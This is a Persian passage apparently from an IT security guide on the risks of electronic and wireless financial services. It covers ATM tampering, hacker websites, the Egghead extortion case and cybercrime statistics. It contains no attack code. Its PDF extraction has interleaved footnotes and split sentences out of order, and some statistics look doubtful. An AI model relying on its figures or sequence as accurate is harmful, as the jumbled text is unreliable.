ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺑﺰﺭﮒ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ
ﺧﻄﻮﻁ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮﭼﻪ ﻏﺎﻟﺐ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺯ
ﻟﺤﺎﻅ ﺍﻗﺘﺼﺎﺩﻱ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺘﻪ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﺎﻋـﺚ
ﺗﺮﺍﻓﻴﻚ ﺯﻳﺎﺩ ﻭ ﺣﺠﻢ ﻭﺳﻴﻊ ﻋﻤﻠﻴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲ ﺷﻮﺩ؛ ﻭ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺩﻏﺪﻏﺔ ﺑـﺰﺭﮒ
ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ ١٤١.ﺗﺎ ﺳﺎﻝ ۲۰۰۵ﺳﻬﻢ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ
ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻﻨﻌﺘﻲ ﺍﺯ %۸،۵ﺑﻪ %۵۰ﻭ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺭﺷﺪ ﺍﺯ %۱ﺑﻪ %۱۰ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ .ﺩﺭﺻـﻮﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺑﻬﺘـﺮ
ﺍﺗﺼﺎﻻﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳﺎﻝ ۲۰۰۵ﺗﺎ %۲۰ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑﻨـﺪ؛ ﻛـﻪ
ﺭﻗﻤـــﻲ ﺑـــﻴﺶ ﺍﺯ ﺷـــﺶ ﺗﺮﻳﻠﻴـــﻮﻥ ﺩﻻﺭ ﻣﻌﺎﻣﻠـــﺔ ﺍﻳﻨﺘﺮﻧﺘـــﻲ
١٤٣
ﺗﺠﺎﺭﺕ-ﺑﻪ-ﺗﺠﺎﺭﺕ ) ١٤٢(B2Bﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺩﺭ ﭘﻲ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻚ ﻧﮕـﺮﺵ ﺩﻳﮕـﺮ ﻧﻴـﺰ
ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﺍﺳﺖ :ﮔﺴﺘﺮﺵ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻛﺎﺭﺑﺮﺩ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺑﻲﺳﻴﻢ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ .ﺍﻳﻦ ﺭﺳـﺎﻧﺔ
ﻧﺴﺒﺘﹰﺎ ﺟﺪﻳﺪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﺗﺒـﺪﻳﻞ ﺷـﺪﻥ ﺑـﻪ ﺭﺳـﺎﻧﺔ ﺍﺻـﻠﻲ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ .ﺗﺤـﻮﻝ
ﻛﺴﺐ ﻭ ﻛﺎﺭﻫﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻏﺬﻱ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺴﻴﺎﺭ ﻋﻤﻴﻖ ﺑﻮﺩﻩ ﺍﺳـﺖ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﺑـﺴﺘﺮ ﺍﻧـﻮﺍﻉ
ﺧﺪﻣﺎﺕ ﺍﺯ ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺑـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺎ ﺍﻣﻜـﺎﻥ
137
138
139
140
141
Electronic Funds Transfers
Electronic Data Interchange
Electronic Benefits Transfers
Electronic Trade Confirmation
Dr. Joseph N. Pelton, "Satellite
Communications 2001: The Transition to
Mass-Consumer Markets, Technologies, and
Systems".
142 Business To Business
143 Jupiter Communications, 2001
١٨٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ،ﺍﺛﺮﺍﺕ ﻣﻨﻔـﻲ ﺍﻳـﻦ ﭘﺪﻳـﺪﻩ ﻧﻴـﺰ
ﮔﺴﺘﺮﺵ ﻣﻲﻳﺎﺑﺪ.
ﺗﻮﺳﻌﺔ ﻣﺪﺍﻭﻡ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳـﺪ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﻣﺜﻞ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺑﻲﺳﻴﻢ ،ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬـﺎ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﺑﻮﺟـﻮﺩ
ﺁﻭﺭﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ؛ ﺍﻣـﺎ
ﻧﻜﺘﻪ ﺍﻳﻨﺠﺎﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺍﻗﺘـﺼﺎﺩ ﺭﺳـﻤﻲ
ﻧﻴﺴﺘﻨﺪ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎ ﺍﻗﺘـﺼﺎﺩ ﺯﻳﺮﺯﻣﻴﻨـﻲ ﻭ ﻣﺠﺮﻣﺎﻧـﻪ
ﺟﻬﺎﻧﻲ ﻫﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺑﻪ ﺧﻮﺑﻲ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻭﻓﻖ ﺩﻫﺪ .ﺍﺭﺍﺋﻪ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ
144 Box 1 of "E-Finance in Emerging Markets: Is
Leapfrogging Possible?", Claessens S., T.
Glaessener, D. Klingebiel, 2001.
ﺏ .ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ
ﺩﺭ ﻛﻨﺎﺭ ﻓﻮﺍﻳﺪ ﺯﻳﺎﺩ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ،ﻣﺨﺎﻃﺮﺍﺗﻲ ﻫﻢ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ
ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺳـﺮﻗﺖ ﺭﺍ
ﻧﻴﺰ ﺗـﺴﻬﻴﻞ ﻣـﻲﻛﻨـﺪ .ﺍﻛﻨـﻮﻥ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺟﻌـﻞ ﻫﻮﻳـﺖ،
ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻭ ﭼﺎﭖ ﺗـﺼﺎﻭﻳﺮ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺑـﺎ ﻛﻴﻔﻴـﺖ
ﻋــﺎﻟﻲ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺑــﺴﺘﺮﻫﺎﻱ
ﭼﻨــﺪﻣﻨﻈﻮﺭﻩ ﺍﻧﺠــﺎﻡ ﺁﻧﻬــﺎ ﺭﺍ ﺗــﺴﻬﻴﻞ ﻣــﻲﻛﻨﻨــﺪ .ﺑــﺎ ﮔــﺴﺘﺮﺵ
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ ١٤٦ﻛﻪ ﺩﺭ ﻣﻨﺎﻃﻖ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ
ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻮﻝ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ،ﺑﺰﻫﻜﺎﺭﺍﻥ ﻗﺎﺩﺭﻧﺪ ﻛـﻪ
ﺍﺗﺼﺎﻝ ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻭ ﺑﺎﻧـﻚ ﻣـﺎﺩﺭ ﺭﺍ
ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﻮﺩﻩ ﻭ ﻛﻠﻴﺔ ﺗﺒـﺎﺩﻻﺕ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟـﻲ ﺩﺳـﺘﮕﺎﻩ
ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﻨﺪ .ﻫﻨﺮ ﻧﻔﻮﺫ ﺑﺮﺧﻂ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻳـﻚ
ﺗﺨﺼﺺ ﭘﻴﭽﻴﺪﻩ ﺑـﻮﺩ ،ﺍﻣـﺎ ﻋـﺼﺮ ﺍﻃﻼﻋـﺎﺕ ،ﺯﻣﻴﻨـﻪ ﺭﺍ ﺑـﺮﺍﻱ
ﮔﺴﺘﺮﺵ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮﺯﻣﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ -ﻛـﻪ
ﺍﻣﺮﻭﺯﻩ ﺑﺎ ﺍﺭﺍﺋﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺍﻗﺘﺼﺎﺩﻱ ،ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲ ﻛﻨﻨـﺪ -
ﻓــﺮﺍﻫﻢ ﻧﻤــﻮﺩﻩ ﺍﺳــﺖ .ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻣﺎﻧﻨــﺪ
www.astalavista.box.skﻭ ﻳﺎ www.attrition.org
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻣﺒﺘـﺪﻱ
ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧـﺪ .ﺷـﺮﻛﺖ
(www.idc.com) Internet Data Centerﺍﺧﻴـــﺮﹰﺍ ﺩﺭ
ﮔﺰﺍﺭﺷﻲ ﺍﻋﻼﻡ ﻛـﺮﺩﻩ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ %۵۷ﻛـﻞ ﺣﻤـﻼﺕ ﺳـﺎﻝ
ﮔﺬﺷﺘﻪ ،ﻣﺘﻮﺟﻪ ﺑﺨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﻣﺨﺎﻃﺮﺍﺕ ﺳﻨﺘﻲ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺘﺤـﻮﻝ ﺷـﺪﻩﺍﻧـﺪ .ﺩﺭ ﻃـﻮﻝ
ﺗﺎﺭﻳﺦ ﺗﺎ ﻛﻨﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻫﻤـﻮﺍﺭﻩ ﺷـﺎﻣﻞ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﺳﻨﺎﺩ ﭼـﺎﭘﻲ ﻳـﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻓـﺮﺍﺩ ﺑـﻮﺩﻩ ،ﺍﻣـﺎ ﺩﺭ ﻣﺤـﻴﻂ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺻﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻗﺘـﺼﺎﺩﻱ ﺑﻮﺟـﻮﺩ
ﺁﻣــﺪﻩ ﺍﺳــﺖ .ﺩﺭ ﺳــﺎﻝ ۲۰۰۱ﺑــﻴﺶ ﺍﺯ ﻳــﻚ ﭼﻬــﺎﺭﻡ )(%۲۷
١٤٧
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻭ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧـﺪ.
ﺑﺎﻧﺪﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺻﺪﻫﺎ ﺑﺎﻧـﻚ ﺭﺍ ﺩﺭ ﺳﺮﺗﺎﺳـﺮ
ﺟﻬﺎﻥ ﻣﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺟـﺮﺍﺋﻢ
۱۴۵ﻗﺴﻤﺖ ﺍﻭﻝ ﻛﺘﺎﺏ:
"E-Finance in Emerging Markets: Is
Leapfrogging Possible?", 2001.
ﺑﻪ ﻗﻠﻢClaessens. S,T. Glaessner, D. Klingebiel
146 Dialup ATM
147 Evans Data Corp. Survey
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺳ ـﺘﮕﺎﻫﻬﺎﻱ ﺳــﻴﺎﺭ ﺍﻣــﺮﻭﺯﻩ ﺑﻌﻨــﻮﺍﻥ ﻟﺒــﺔ ﺩﺭﺣــﺎﻝ ﭘﻴــﺸﺮﻓﺖ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﻬﺎﻥ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺳﺎﻝ ۱۹۹۰ﺗﻨﻬﺎ ﻳﺎﺯﺩﻩ
ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺗﻤﺎﻡ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺷـﺖ ١٤٤.ﺗـﺎ
ﺳﺎﻝ ۱۹۹۹ﻭ ﺑﺎ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺍﻳـﻦ ﺭﻗـﻢ ﺑـﻪ
ﭼﻴﺰﻱ ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻧﺼﺪ ﻣﻴﻠﻴﻮﻥ ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﻴﺰ ﺗﻘﺮﻳﺒـﹰﺎ
ﺩﻭ ﺑﺮﺍﺑﺮ ﺁﻥ ﻣﻘﺪﺍﺭ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺭﺳﻲ ﺁﻣﺎﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺟﻬﺸﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ
ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺭﺍ ﺑﺨـﻮﺑﻲ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ١٤٥.ﻛـﺸﻮﺭ ﻛــﺎﻣﺒﻮﺝ
ﺩﺭﺣﺎﻟﻴﻜﻪ ﭘﺲ ﺍﺯ ﺣﺪﻭﺩ ۲۰ﺳﺎﻝ ﺟﻨﮓ ﺷـﻬﺮﻱ ﺷـﺒﻜﺔ ﺧﻄـﻲ
ﺛﺎﺑﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﻮﺩ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ
ﺗﻮﺍﻧﺴﺖ ﺑﺎﺭ ﺩﻳﮕـﺮ ﺍﺗـﺼﺎﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ .ﺩﺭ ﺧـﻼﻝ
ﻳﻜﺴﺎﻝ ﺑﻌﺪ ﺍﺯ ﺁﻏﺎﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ،ﺗﻌﺪﺍﺩ ﻣﺸﺘﺮﻛﺎﻥ
ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺗﻠﻔﻨﻬﺎﻱ ﺛﺎﺑﺖ ﭘﻴﺸﻲ ﮔﺮﻓﺖ .ﻛﺎﻣﺒﻮﺝ
ﺩﺭﺣﺎﻟﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﻛﻤﺘﺮﻳﻦ ﺩﺭﺁﻣـﺪﻫﺎﻱ ﺳـﺮﺍﻧﺔ ﺩﻧﻴـﺎ ﺭﺍ ﺩﺍﺭﺩ ،ﺩﺭ
ﺯﻣﻴﻨﺔ ﮔﺴﺘﺮﺵ ﻋﻤﻮﻣﻲ ﺗﻠﻔﻦ ﺍﺯ ۳۱ﻛﺸﻮﺭ -ﺍﺯ ﺟﻤﻠـﻪ ﺑﻌـﻀﻲ
ﻛﺸﻮﺭﻫﺎ ﻛﻪ ﺩﺭﺁﻣﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺁﻥ ﺩﺍﺭﻧﺪ -ﭘﻴـﺸﻲ ﮔﺮﻓﺘـﻪ
ﺍﺳﺖ .ﻛﺸﻮﺭﻫﺎﻱ ﺩﻧﻴﺎ ﺑﺠﺎﻱ ﺻﺮﻑ ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻥ ﻣﻨﺎﺑﻊ ﻭ ﺯﻣﺎﻥ
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧﻄﻲ ﺛﺎﺑﺖ ﺟﻬﺖ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ،
ﺍﻳﻦ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﺑﺎ ﺑﺮﺟﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﻛـﻪ
ﺗﻮﻟﻴﺪ ﺁﻧﻬﺎ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﺍﺳـﺖ ﺟـﺎﻳﮕﺰﻳﻦ ﻧﻤـﻮﺩﻩﺍﻧـﺪ .ﺍﻟﺒﺘـﻪ ﺍﻳـﻦ
ﺗﺤﻮﻻﺕ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪﻱ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺷـﺘﻪ ﻛـﻪ
ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺟﺪﻱ ﻫﺴﺘﻨﺪ.
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﺗﺒﺎﺩﻝ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺟﻌﻠـﻲ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺧـﺎﺫﻱ
ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺍﺳﺖ.
١٨٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻧﻔﻮﺫ ﺑﻌﻨﻮﺍﻥ ﻣﺪﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﻣﻄﺮﺡ ﺍﺳﺖ.
ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ FBIﺍﻋﻼﻡ ﻛﺮﺩﻩ ﻛـﻪ ﺍﻛﺜـﺮ ﺑﺎﻧﻜﻬـﺎ ﺑـﻪ
ﻋﻠــﺖ ﺗــﺮﺱ ﺍﺯ ﺑــﻲﺁﺑﺮﻭﻳــﻲ ﻭ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻥ ﻣــﺸﺘﺮﻳﺎﻥ ،ﺑــﺎﺝ
ﻣﻲ ﭘﺮﺩﺍﺯﻧﺪ .ﺍﺧﺎﺫﻱ Eggheadﺩﺭ ﺳﺎﻝ ﮔﺬﺷـﺘﻪ ﻳـﻚ ﻧﻤﻮﻧـﺔ
ﻣﺸﻬﻮﺭ ﺍﺳﺖ ،ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺷـﺎﻣﻞ ﺩﻩ
ﻫﺰﺍﺭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻧـﺪ ﻭ ﺑـﺮﺍﻱ
ﺍﻳﻨﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻨﺘﺸﺮ ﻧﻜﻨﻨﺪ ﻣﺒﻠﻎ
ﮔﺰﺍﻓﻲ ﺭﺍ ﺍﺯ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑﺎﺝﺧﻮﺍﻫﻲ ﻛﺮﺩﻧﺪ .ﺑﻌـﺪ ﺍﺯ ﺁﻥ ﻧﻴـﺰ ﺩﺭ
ﺷﺐ ﻛﺮﻳﺴﻤﺲ ﺍﺯ ﻣﻮﺟـﻮﺩﻱ ﻫـﺮ ﻛـﺎﺭﺕ ﻣﺒﻠـﻎ ﻛـﻮﭼﻜﻲ ﻛـﻢ
ﻛﺮﺩﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﻜﻞ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺎﻟﻲ ﻭ ﺣﻴﺜﻴﺘـﻲ ﺍﺳـﺖ.
ﻳﻚ ﭘﻴﺶ ﺑﻴﻨﻲ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳﻦ ﺍﻣـﺮ ﺍﺳـﺖ ﻛـﻪ ﺣـﻮﺍﺩﺙ ﺳـﺮﻗﺖ
ﻫﻮﻳﺖ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑـﻴﺶ ﺍﺯ ﺳـﻪ ﺑﺮﺍﺑـﺮ ﺧﻮﺍﻫـﺪ ﺷـﺪ ﻭ ﺍﺯ
۷۰۰,۰۰۰ﺩﻻﺭ ١٤٨ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ ۱،۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ
۲۰۰۵ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ؛ ﻭ ﻫﺰﻳﻨـﺔ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﻫـﻢ ﺑـﺎ
ﺍﻓﺰﺍﻳﺶ %۳۰ﺍﺯ ﻣـﺮﺯ ۸ﻣﻴﻠﻴـﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۵ﺧﻮﺍﻫـﺪ
١٤٩
ﮔﺬﺷﺖ.
ﺟــﺮﺍﺋﻢ ﺳــﺎﻳﺒﺮ ﺭﺷــﺪ ﭼــﺸﻢﮔﻴــﺮﻱ ﺩﺍﺷــﺘﻪ ﺍﺳــﺖ .ﺣﻤﻠــﻪ ﺑــﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻧﺴﺒﺖ ﺑﻪ ﺳﺎﻝ ۲۰۰۰ﺩﻭ ﺑﺮﺍﺑﺮ
ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ %۹۰ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘﻨـﺪ
ﻋﻠﻴـﺮﻏﻢ ﺑﺮﺧـﻮﺭﺩﺍﺭﻱ ﺍﺯ ﺍﻧـﻮﺍﻉ ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ ،ﺑـﻪ ﻭﻳﺮﻭﺳــﻬﺎ ﻭ
